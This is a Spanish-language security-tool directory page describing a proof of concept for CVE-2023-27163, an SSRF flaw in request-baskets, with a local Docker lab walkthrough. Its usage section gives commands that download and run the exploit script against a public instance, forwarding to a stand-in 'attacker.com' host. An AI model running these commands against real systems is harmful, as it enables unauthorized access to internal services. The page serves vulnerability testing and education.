Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-27163 — Prueba de concepto para Falsificación de Solicitud del Lado del Servidor (SSRF) en request-baskets (<= v.1.2.1) | Kitploit
Herramientas/GitHubGitHub/entr0pie/cve-2023-27163
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

Prueba de concepto para Falsificación de Solicitud del Lado del Servidor (SSRF) en request-baskets (<= v.1.2.1)

Ver Repositorio
3154hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Sitio web
Compartir

PoC de SSRF en Request-Baskets (CVE-2023-27163)

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2023-27163, una vulnerabilidad de Server-Side Request Forgery (SSRF) descubierta en request-baskets hasta la versión 1.2.1. Esta vulnerabilidad permite a atacantes acceder a recursos de red e información sensible explotando el componente /api/baskets/{name} mediante una solicitud API manipulada.

Créditos a @b33t1e, @chelinboo147 y @houqinsheng (ver artículo).

Uso

wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

¿Cómo funciona?

Request-baskets es una aplicación web construida para recolectar y registrar solicitudes en una ruta específica, llamada basket. Al crearla, el usuario puede especificar otro servidor para reenviar la solicitud. El problema aquí es que el usuario puede especificar servicios no deseados, como aplicaciones cerradas a la red.

Por ejemplo: supongamos que el servidor aloja Request-baskets (puerto 55555) y un servidor web Flask en el puerto 8000. Flask también está configurado para interactuar solo con localhost. Al crear un basket que reenvíe a http://localhost:8000, el atacante puede acceder al servidor web Flask previamente restringido.

Prueba en localhost

Imagen de PoC

  1. Inicie el contenedor Docker de Request-Baskets
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. Descargue la PoC
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. Espere una conexión
nc -lvp 8000
  1. Guarde la dirección IP del host Docker
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Ejecute la PoC
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

Licencia

Este proyecto está bajo la Unlicense.

Descargar herramienta